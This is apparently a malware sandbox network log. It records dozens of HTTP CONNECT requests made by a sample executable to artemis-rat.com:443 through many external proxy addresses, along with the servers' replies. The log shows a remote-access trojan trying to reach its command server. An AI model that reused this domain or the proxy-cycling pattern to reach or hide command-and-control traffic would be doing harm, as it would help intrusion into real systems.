                                                                                                                                                                                                                                                            1941192.168.2.555233192.163.200.93353963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.179229021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1942192.168.2.554963148.66.130.53478913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273525953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.311337948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396034002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.400080919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1943192.168.2.55185060.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273618937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1944192.168.2.555296185.238.228.240803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273624897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.428848028 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1945192.168.2.555289162.159.242.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.274450064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.436228037 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1946192.168.2.555322172.67.182.78803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.274869919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.429615974 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1947192.168.2.555346104.17.171.79803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.278002977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.432636023 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1948192.168.2.555318192.169.226.96505783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.278076887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905004978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1949192.168.2.55517964.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.288475990 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1950192.168.2.555364104.18.103.125803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.288477898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.446789026 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1951192.168.2.55527438.162.21.2031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.289443016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.699903965 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1952192.168.2.55534412.186.205.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.289865017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1953192.168.2.55502551.75.125.208270293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.289923906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1954192.168.2.555382202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290072918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1955192.168.2.55499151.15.252.246163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290204048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.311366081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396049023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.400059938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1956192.168.2.55533038.162.1.14231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290564060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.724111080 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1957192.168.2.555230103.213.97.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290607929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.605576992 CET334INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1958192.168.2.555220103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290750027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1959192.168.2.555357198.12.255.193485723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290765047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1960192.168.2.55526554.178.159.199180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290832043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.557030916 CET503INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 324
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1961192.168.2.555258211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.294595003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1962192.168.2.55528113.40.239.13031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
Mar 11, 2024 03:30:47.296787024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.587786913 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:47 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1963192.168.2.555232123.30.154.17177773876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.300721884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.666925907 CET | 343 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:47 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1964192.168.2.555413202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.300721884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1965192.168.2.555257185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.304250002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1966192.168.2.555414202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.304627895 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1967192.168.2.555416202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.308069944 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1968192.168.2.55541914.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.314160109 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1969192.168.2.55542314.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.316241980 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1970192.168.2.55542514.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.317102909 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1971192.168.2.55542693.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.317184925 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1972192.168.2.55542814.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.318222046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1973192.168.2.55542793.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.318222046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1974192.168.2.55542993.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
